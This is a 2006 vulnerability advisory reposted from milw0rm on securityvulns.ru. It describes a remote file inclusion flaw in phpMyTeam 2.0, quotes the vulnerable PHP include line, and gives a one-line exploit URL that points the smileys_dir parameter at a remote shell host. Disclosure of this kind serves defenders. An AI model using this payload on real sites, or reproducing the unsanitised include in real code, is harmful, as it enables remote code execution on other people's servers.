Security Advisory: phpMyTeam <= 2.0 (smileys_dir) Remote File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SA22137] BBaCE "phpbb_root_path
" File Inclusion
  [SA22261] Drupal IMCE Module Multiple Vulnerabilities
  [SA22242] HAMweather "do_parse_code"
Command Injection Vulnerability
  [SA22238] OpenBiblio Local File Inclusion and SQL Injection

From: MILW0RM <submit_(at)_milw0rm.com>
Date: 05.10.2006
Subject: phpMyTeam <= 2.0 (smileys_dir) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

phpMyTeam v2.0 <= (smileys_dir) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

URL: http://www.phpscripts-fr.net/scripts/download.php?id=1627

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Vuln. Code:

$smiley_pack_path = $smileys_dir.$smiley_pack_name.'/';
@include($smiley_pack_path.'smileys.php');

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Exploit: /images/smileys/smileys_packs.php?smileys_dir=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

# milw0rm.com [2006-10-05]